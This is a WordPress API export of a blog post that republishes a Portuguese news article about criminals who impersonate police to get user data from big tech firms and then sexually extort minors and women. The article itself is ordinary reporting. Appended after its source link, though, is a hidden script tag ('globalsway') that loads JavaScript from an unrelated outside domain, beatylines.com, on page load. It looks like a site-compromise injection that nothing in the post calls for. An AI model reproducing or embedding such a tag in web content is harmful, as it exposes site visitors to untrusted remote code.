{"id":619,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/criminosos-intimidam-criancas-com-dados-obtidos-de-big-techs\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"criminosos-intimidam-criancas-com-dados-obtidos-de-big-techs","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/criminosos-intimidam-criancas-com-dados-obtidos-de-big-techs\/","title":{"rendered":"Criminosos intimidam crian\u00e7as com dados obtidos de Big Techs"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>A <a href=\"https:\/\/www.uol.com.br\/tilt\/apple\/\">Apple<\/a>, a <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/10\/28\/facebook-agora-e-meta-entenda-a-mudanca-de-nome-da-empresa.htm\">Meta<\/a>, o Twitter e outras gigantes da tecnologia t\u00eam sido enganadas por hackers, e podem ter contribu\u00eddo para a extors\u00e3o de menores e mulheres. Os criminosos se passam por policiais para conseguir dados pessoais sens\u00edveis de usu\u00e1rios dessas companhias, e ent\u00e3o entram em contato com eles.<\/p>\n<p>Esta t\u00e1tica <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/04\/01\/hackers-fingem-ser-policiais-para-roubar-dados-de-clientes-da-apple-e-meta.htm\">j\u00e1 havia sido empregada em fraudes financeiras<\/a>, mas agora tamb\u00e9m foi usada para extorquir sexualmente as v\u00edtimas, que s\u00e3o for\u00e7adas a produzir e enviar fotos e v\u00eddeos \u00edntimos. <a href=\"https:\/\/www.uol.com.br\/tilt\/google\/\">Google<\/a>, Snap e Discord tamb\u00e9m est\u00e3o entre as empresas alvo do golpe.<\/p>\n<p>N\u00e3o se sabe quantos pedidos falsos de dados as big techs j\u00e1 receberam, j\u00e1 que eles parecem vir de \u00f3rg\u00e3os da lei leg\u00edtimos. De acordo as autoridades norte-americanas, estes incidentes se tornaram &#8220;mais prevalentes&#8221; nos \u00faltimos meses.<\/p>\n<h2>Como se proteger?<\/h2>\n<p>Este golpe \u00e9 especialmente efetivo pois as v\u00edtimas n\u00e3o tiveram nem chance de se proteger \u2014 o simples uso das plataformas as deixou expostas. A \u00fanica maneira de evitar \u00e9 n\u00e3o usar os servi\u00e7os das empresas, o que \u00e9 quase imposs\u00edvel nos dias de hoje.<\/p>\n<p>Os hackers tiveram sucesso pois, normalmente, as gigantes de tecnologia respondem a apelos de emerg\u00eancia das autoridades (casos de perigo iminente, como suic\u00eddio, assassinato ou sequestro) compartilhando uma quantidade limitada de informa\u00e7\u00f5es primeiro, mesmo sem ordem judicial, em sinal de boa f\u00e9, e fazendo perguntas depois.<\/p>\n<p>Os dados enviados costumam incluir nome, IP, email e endere\u00e7o f\u00edsico. N\u00e3o \u00e9 muito, mas mais que suficiente para criminosos realizarem pr\u00e1ticas de phishing (conseguir senhas, n\u00famero de cart\u00e3o etc), doxing (divulgar informa\u00e7\u00f5es pessoais), swatting (enviar uma equipe de pol\u00edcia para a casa da pessoa) e outros golpes.<\/p>\n<p>De acordo com a Bloomberg, alguns dos hackers invadiram as contas das <a href=\"https:\/\/www.uol.com.br\/tilt\/redes-sociais\/ \">redes sociais<\/a> das v\u00edtimas para conseguir fotos e v\u00eddeos \u00edntimos, ou fizeram amizade com mulheres e menores, encorajando-os a enviar imagens expl\u00edcitas.<\/p>\n<p>Tamb\u00e9m amea\u00e7aram vazar estes conte\u00fados para amigos, familiares e diretores de escola, se n\u00e3o cumprissem algumas ordens. Em alguns casos, as v\u00edtimas foram pressionadas a cortar sua pele com o nome do <a href=\"https:\/\/www.uol.com.br\/tilt\/hacker\/\">hacker<\/a>.<\/p>\n<p>Acredita-se que muitos dos criminosos sejam adolescentes, residentes nos Estados Unidos e de outros pa\u00edses.<\/p>\n<h2>H\u00e1 solu\u00e7\u00e3o?<\/h2>\n<p>E agora, como diferenciar as autoridades falsas das reais, sem comprometer o andamento da Justi\u00e7a? &#8220;Ningu\u00e9m quer que as empresas de tecnologia recusem pedidos leg\u00edtimos de emerg\u00eancia, quando a seguran\u00e7a de algu\u00e9m est\u00e1 em jogo&#8221;, disse o senador Ron Wyden. &#8220;Mas o sistema atual tem pontos fracos claros que precisam ser resolvidos.&#8221;<\/p>\n<p>&#8220;N\u00f3s revisamos todos os pedidos de dados e usamos sistemas e processos avan\u00e7ados para validar solicita\u00e7\u00f5es de aplica\u00e7\u00e3o da lei e detectar abusos&#8221;, disse Andy Stone, porta-voz da Meta, ao Engadget. &#8220;Bloqueamos contas comprometidas de fazer solicita\u00e7\u00f5es e trabalhamos com a aplica\u00e7\u00e3o da lei para responder a incidentes envolvendo solicita\u00e7\u00f5es fraudulentas suspeitas.&#8221;<\/p>\n<p>As big techs podem ter de implementar algum tipo de &#8220;autentica\u00e7\u00e3o de dois fatores&#8221; com a pol\u00edcia, como uma chamada de volta, ou mesmo um sistema espec\u00edfico para realiza\u00e7\u00e3o destes pedidos, no qual seria mais f\u00e1cil detectar uma invas\u00e3o hacker.<\/p>\n<\/p><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/04\/30\/apple-meta-e-twitter-sao-enganadas-para-exploracao-sexual-de-menores.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A Apple, a Meta, o Twitter e outras gigantes da tecnologia t\u00eam sido enganadas por hackers, e podem ter contribu\u00eddo para a extors\u00e3o de menores e mulheres. Os criminosos se passam por policiais para conseguir dados pessoais sens\u00edveis de usu\u00e1rios dessas companhias, e ent\u00e3o entram em contato com eles. Esta t\u00e1tica j\u00e1 havia sido empregada&#8230;<\/p>\n","protected":false},"author":1,"featured_media":620,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[601,27,1348,703,1349,1350,602],"class_list":["post-619","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-big","tag-criancas","tag-criminosos","tag-dados","tag-intimidam","tag-obtidos","tag-techs"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/619","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=619"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/619\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/620"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=619"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=619"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=619"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}